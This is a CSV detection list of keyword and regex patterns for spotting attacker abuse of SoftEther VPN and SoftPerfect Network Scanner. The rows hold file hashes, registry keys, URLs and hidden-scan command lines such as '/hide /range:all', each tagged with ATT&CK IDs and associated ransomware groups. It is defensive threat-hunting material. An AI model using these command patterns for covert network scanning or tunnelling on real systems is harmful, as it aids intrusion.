"*d68eab271b4e5ec8de105d2bf87d9b3bf6b1f56634bc2259573ea371883d31f0*",".{0,1000}d68eab271b4e5ec8de105d2bf87d9b3bf6b1f56634bc2259573ea371883d31f0.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*d70cda7c8116dab7b29389db19375fcec3422cc05737f8f151803ad767eaac80*",".{0,1000}d70cda7c8116dab7b29389db19375fcec3422cc05737f8f151803ad767eaac80.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*d7b7a7f5495c5fa5ab70827e041e6f48b2e3a13d26c83706369f8b83080a2e8f*",".{0,1000}d7b7a7f5495c5fa5ab70827e041e6f48b2e3a13d26c83706369f8b83080a2e8f.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*dcd12874e909f6f973d17a9a9a4bb2bb5c0eb1dde3c840a01d9b8a2f89217e76*",".{0,1000}dcd12874e909f6f973d17a9a9a4bb2bb5c0eb1dde3c840a01d9b8a2f89217e76.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*df5b10dce307f6a8cbec606b0eaaf11dff457a5cc46c1b16f62cd29d39e610a1*",".{0,1000}df5b10dce307f6a8cbec606b0eaaf11dff457a5cc46c1b16f62cd29d39e610a1.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*dfb21c50807a7fe098be6e333af0807a1b22f67abf42e036d06f06d594a01fbc*",".{0,1000}dfb21c50807a7fe098be6e333af0807a1b22f67abf42e036d06f06d594a01fbc.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*e0f22e76771f73fd1b8b91f8ed3c6d2ecc3f5bf1b8b72e8a0208ddc43bc83191*",".{0,1000}e0f22e76771f73fd1b8b91f8ed3c6d2ecc3f5bf1b8b72e8a0208ddc43bc83191.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*e16fca64d823fe922146ce8d9d908a4fff879dd5a89985f547661706579eb240*",".{0,1000}e16fca64d823fe922146ce8d9d908a4fff879dd5a89985f547661706579eb240.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*e1e0882b31d096b3d7c4dd7e433dec30e36d165610621f4e34a705b35fac5335*",".{0,1000}e1e0882b31d096b3d7c4dd7e433dec30e36d165610621f4e34a705b35fac5335.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*e4c962237d4b3e6e4af1be6082ef976c32b80d17b5c24079b9c59f0ba9775e7e*",".{0,1000}e4c962237d4b3e6e4af1be6082ef976c32b80d17b5c24079b9c59f0ba9775e7e.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*e5469979ac08d21bad44cd7696187e80d4ef78b60f473a954936de4cbc3d0381*",".{0,1000}e5469979ac08d21bad44cd7696187e80d4ef78b60f473a954936de4cbc3d0381.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*f0d3f6d841b1d8e4478f25771fa6f58717fed13de6c28dec36bf497c7b035853*",".{0,1000}f0d3f6d841b1d8e4478f25771fa6f58717fed13de6c28dec36bf497c7b035853.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*f139f24cb99599d9f666d925cf0371aff4eaf5fbf531634ee3a2740d5b646da3*",".{0,1000}f139f24cb99599d9f666d925cf0371aff4eaf5fbf531634ee3a2740d5b646da3.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*f1b1b2b181d6148660067534534e7c85f49241068fca8b3c1f6099216b67fb39*",".{0,1000}f1b1b2b181d6148660067534534e7c85f49241068fca8b3c1f6099216b67fb39.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*f402294bb18473a6dc22baec0c86e635cd2bc0423cb10026b5cbf9d6efcc698d*",".{0,1000}f402294bb18473a6dc22baec0c86e635cd2bc0423cb10026b5cbf9d6efcc698d.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*f7fcde269f7db9393f6e548fa4c0507f7a76b8a9a44caf34a69f7901463be977*",".{0,1000}f7fcde269f7db9393f6e548fa4c0507f7a76b8a9a44caf34a69f7901463be977.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*fc208016c808df328b5dfdecbb8b40883e1d10b3c064ea6a1126fcf3b8927531*",".{0,1000}fc208016c808df328b5dfdecbb8b40883e1d10b3c064ea6a1126fcf3b8927531.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*gitlab.com/SoftEther/VPN.git*",".{0,1000}gitlab\.com\/SoftEther\/VPN\.git.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*HKLM\SOFTWARE\SoftEther VPN *",".{0,1000}HKLM\\SOFTWARE\\SoftEther\sVPN\s.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*HKLM\Vpn_Check_Admin_Key_*",".{0,1000}HKLM\\Vpn_Check_Admin_Key_.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*http://get-my-ip.ddns.softether-network.net/ddns/getmyip.ashx*",".{0,1000}http\:\/\/get\-my\-ip\.ddns\.softether\-network\.net\/ddns\/getmyip\.ashx.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*http://get-my-ip.ddns.uxcom.jp/ddns/getmyip.ashx*",".{0,1000}http\:\/\/get\-my\-ip\.ddns\.uxcom\.jp\/ddns\/getmyip\.ashx.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*http://get-my-ip-v6.ddns.softether-network.net/ddns/getmyip.ashx*",".{0,1000}http\:\/\/get\-my\-ip\-v6\.ddns\.softether\-network\.net\/ddns\/getmyip\.ashx.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*http://get-my-ip-v6.ddns.uxcom.jp/ddns/getmyip.ashx*",".{0,1000}http\:\/\/get\-my\-ip\-v6\.ddns\.uxcom\.jp\/ddns\/getmyip\.ashx.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*http://senet.aoi.flets-east.jp/ddns/getmyip.ashx*",".{0,1000}http\:\/\/senet\.aoi\.flets\-east\.jp\/ddns\/getmyip\.ashx.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*http://senet.p-ns.flets-west.jp/ddns/getmyip.ashx*",".{0,1000}http\:\/\/senet\.p\-ns\.flets\-west\.jp\/ddns\/getmyip\.ashx.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*http://senet-flets.v6.softether.co.jp/ddns/getmyip.ashx*",".{0,1000}http\:\/\/senet\-flets\.v6\.softether\.co\.jp\/ddns\/getmyip\.ashx.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*https://*.dev.servers.ddns.softether-network.net/ddns/ddns.aspx*",".{0,1000}https\:\/\/.{0,1000}\.dev\.servers\.ddns\.softether\-network\.net\/ddns\/ddns\.aspx.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*https://*.dev.servers-v6.ddns.softether-network.net/ddns/ddns.aspx*",".{0,1000}https\:\/\/.{0,1000}\.dev\.servers\-v6\.ddns\.softether\-network\.net\/ddns\/ddns\.aspx.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*https://senet-flets.v6.softether.co.jp/ddns/ddns.aspx*",".{0,1000}https\:\/\/senet\-flets\.v6\.softether\.co\.jp\/ddns\/ddns\.aspx.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*https://www.softether-download.com/*",".{0,1000}https\:\/\/www\.softether\-download\.com\/.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*service softether_server *",".{0,1000}service\ssoftether_server\s.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*SoftEtherVPN/SoftEtherVPN_Stable.git*",".{0,1000}SoftEtherVPN\/SoftEtherVPN_Stable\.git.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*sysrc softether_server_enable=yes*",".{0,1000}sysrc\ssoftether_server_enable\=yes.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*update-check.softether-network.net*",".{0,1000}update\-check\.softether\-network\.net.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"* /config:netscan.xml *",".{0,1000}\s\/config\:netscan\.xml\s.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"* netscan.exe *",".{0,1000}\snetscan\.exe\s.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"* netscan64.exe *",".{0,1000}\snetscan64\.exe\s.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*.exe * /hide * /range:* /auto:*.*",".{0,1000}\.exe\s.{0,1000}\s\/hide\s.{0,1000}\s\/range\:.{0,1000}\s\/auto\:.{0,1000}\..{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*.exe /hide /range:all*",".{0,1000}\.exe\s\/hide\s\/range\:all.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*.exe /wakeall*",".{0,1000}\.exe\s\/wakeall.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*/netscan.exe*",".{0,1000}\/netscan\.exe.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*/netscan_linux.tar.gz*",".{0,1000}\/netscan_linux\.tar\.gz.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*/netscan_macos.dmg*",".{0,1000}\/netscan_macos\.dmg.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*/netscan_setup.exe*",".{0,1000}\/netscan_setup\.exe.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*/netscan64.exe*",".{0,1000}\/netscan64\.exe.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\SoftPerfect Network Scanner*",".{0,1000}\\AppData\\Roaming\\SoftPerfect\sNetwork\sScanner.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*\netscan.dbm-journal*",".{0,1000}\\netscan\.dbm\-journal.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*\netscan.exe*",".{0,1000}\\netscan\.exe.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*\netscan_linux.tar.gz*",".{0,1000}\\netscan_linux\.tar\.gz.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*\netscan_portable.zip*",".{0,1000}\\netscan_portable\.zip.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
